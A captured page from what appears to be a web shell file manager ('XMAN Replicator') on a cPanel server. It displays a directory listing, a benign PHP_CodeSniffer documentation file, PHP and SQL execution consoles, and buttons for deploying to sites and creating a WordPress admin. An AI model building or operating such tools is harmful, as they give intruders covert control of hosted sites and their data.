🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
squizlabs
/
php_codesniffer
/
src
/
Standards
/
PSR1
/
Docs
/
Files
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2025-11-04 16:30
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2025-11-04 16:30
🔄
🗑️
🗑️📁
⬇️
🔒
SideEffectsStandard.xml
607 B
-rw-r--r--
2025-11-04 16:30
✏️
🔄
🗑️
⬇️
🔒
Edit: SideEffectsStandard.xml
<documentation title="Side Effects"> <standard> <![CDATA[ A PHP file should either contain declarations with no side effects, or should just have logic (including side effects) with no declarations. ]]> </standard> <code_comparison> <code title="Valid: A class defined in a file by itself."> <![CDATA[ <?php class Foo { } ]]> </code> <code title="Invalid: A class defined in a file with other code."> <![CDATA[ <?php class Foo { } <em>echo "Class Foo loaded.";</em> ]]> </code> </code_comparison> </documentation>
Save
PHP Console
Execute
SQL Console
Execute